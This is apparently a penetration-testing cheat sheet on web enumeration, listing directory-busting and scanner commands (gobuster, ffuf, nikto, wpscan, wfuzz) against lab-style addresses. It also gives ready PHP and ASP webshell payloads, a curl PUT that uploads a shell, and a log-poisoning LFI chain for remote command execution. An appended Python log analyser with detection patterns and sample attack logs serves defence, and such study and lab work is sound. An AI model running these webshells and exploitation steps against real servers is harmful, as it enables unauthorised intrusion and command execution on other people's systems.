HTTP Enum

Enumerate directories.

The main thing to remember here is to always run against multiple wordlists, starting with directory-list-2.3-medium.txt.

Gobuster

# URL Search

-- Quick Directory Busting:
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux

-- Comprehensive Directory Busting
gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

-- Search with File Extension
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php

==========

# DNS Search
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt

==========

# vhost Search
gobuster vhost -u https://anysite.com -w common-vhosts.txt

FFUF

ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"

Nikto Web Scan

nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range

Wordpress Scan

wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/

wpscan --url http://10.10.10.10/wp/ --enumerate [u/p/vp/ap/t/vt/at]

**** User ****
u: enumerate users

**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins

**** Themes Switches ****
t: Popular themes only
vt: Vulnerable themes only
at: All themes

Drupal

droopescan scan drupal -u http://10.10.10.10/ -t 32

Joomla

joomscan -u http://10.10.10.10/

Dirb

dirb http://10.10.10.x

******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats

dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

-x : append every extension in this list to each word of the wordlist (big.txt)

Dirsearch

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>

Example
python3 dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: URL to scan.
-e: formats to search.
-w: wordlist.

Netcat

nc 10.10.10.10 80
HEAD / HTTP/1.0        # press Enter twice to send the request
GET / HTTP/1.0

cUrl

# Header
curl -i INSERTIPADDRESS

# Everything else
curl -i -L INSERTIPADDRESS

# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Upload possible?
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php

Wfuzz

----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php

----URL testing----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ

----DNS fuzzing----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62

Upload a PHP file

If you can upload a file, try the snippets below. They can be used to spawn a reverse shell too.

<?php echo system($_GET["cmd"]);?>

OR

<?php echo shell_exec($_GET["cmd"]);?>

WebDav

davtest -url http://10.10.10.10    <-- Test which file extensions can be uploaded.
cadaver http://10.10.10.10/        <-- Connect (WebDAV command-line client)

ASPx Webshell

<%
' Classic ASP (VBScript) syntax: runs the command and writes its stdout into the response
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.ReadAll()
Response.write(o)
%>

Code Execution through HTTP/LFI

nc 10.10.10.10 80
<?php system($_GET['cmd']); ?>
==========
After this, on the LFI you have discovered, just add the cmd variable:
?cmd=id
&cmd=id

http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami
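As an added example (not part of the original notes), here is the defender's side of the techniques on this page: a small Python check that parses Apache combined-format access logs and flags a burst of 404s from one client (directory busting), PHP tags landing in a logged field (the log poisoning step above), traversal strings aimed at /var/log (the LFI read), and WebDAV write methods such as the curl PUT. The log lines are constructed, and the thresholds and patterns are my own assumptions.

```python
import re
from collections import Counter
# Apache "combined" log format; quoted fields may hold \" escapes (a logged payload with quotes does).
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>' + QUOTED + r')" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"$')
# PHP open tags or superglobals in any logged field: the log poisoning step above.
INJECT_RE = re.compile(r'<\?(?:php\b|=)|\$_(?:GET|POST|REQUEST)\[', re.IGNORECASE)
# Plain or URL-encoded "../" and the files an LFI is usually pointed at.
TRAVERSAL_RE = re.compile(r'(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c)|/etc/passwd|/var/log/|/proc/self/', re.IGNORECASE)
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Constructed sample (not from a real host): busting with gobuster's "-a Linux" agent, raw PHP
# pushed in with nc, the same payload in a User-Agent, the LFI read of access.log, a PUT upload.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:00:02 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Linux"
203.0.113.5 - - [10/Mar/2024:10:00:02 +0000] "GET /backup HTTP/1.1" 404 196 "-" "Linux"
203.0.113.5 - - [10/Mar/2024:10:00:03 +0000] "GET /old HTTP/1.1" 404 196 "-" "Linux"
203.0.113.5 - - [10/Mar/2024:10:00:03 +0000] "GET /dev HTTP/1.1" 404 196 "-" "Linux"
198.51.100.9 - - [10/Mar/2024:10:05:00 +0000] "<?php system($_GET['cmd']); ?>" 400 226 "-" "-"
198.51.100.9 - - [10/Mar/2024:10:05:05 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\\"cmd\\"]); ?>"
198.51.100.9 - - [10/Mar/2024:10:05:10 +0000] "GET /somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 1024 "-" "curl/7.88.1"
198.51.100.9 - - [10/Mar/2024:10:06:00 +0000] "PUT /test/shell.php HTTP/1.1" 201 0 "-" "curl/7.88.1"
"""

def parse_line(line):
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    # A malformed request line (raw PHP sent with nc) is logged verbatim with a 400.
    valid = len(parts) == 3 and parts[2].startswith("HTTP/")
    rec["method"], rec["path"] = (parts[0], parts[1]) if valid else ("-", rec["request"])
    return rec

def analyze(lines, notfound_threshold=4):
    # Returns (kind, client_ip, detail) tuples for every suspicious pattern found.
    alerts, notfound = [], Counter()
    for rec in filter(None, map(parse_line, lines)):
        if rec["status"] == "404":
            notfound[rec["ip"]] += 1
        hit = next((f for f in ("request", "referer", "ua") if INJECT_RE.search(rec[f])), None)
        if hit:
            alerts.append(("php_in_log", rec["ip"], hit + ": " + rec[hit]))
        if TRAVERSAL_RE.search(rec["path"]):
            alerts.append(("lfi_traversal", rec["ip"], rec["path"]))
        if rec["method"] in WRITE_METHODS:
            alerts.append(("webdav_method", rec["ip"], rec["method"] + " " + rec["path"]))
    # Many 404s from one client is the footprint of gobuster/ffuf/dirb style busting.
    alerts += [("dir_bruteforce", ip, "%d x 404" % n) for ip, n in notfound.items() if n >= notfound_threshold]
    return alerts
```

Run it against a real access.log with `analyze(open("/var/log/apache2/access.log"))`; the 404 threshold is per file, so raise it for busy hosts.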

Last updated 3 years ago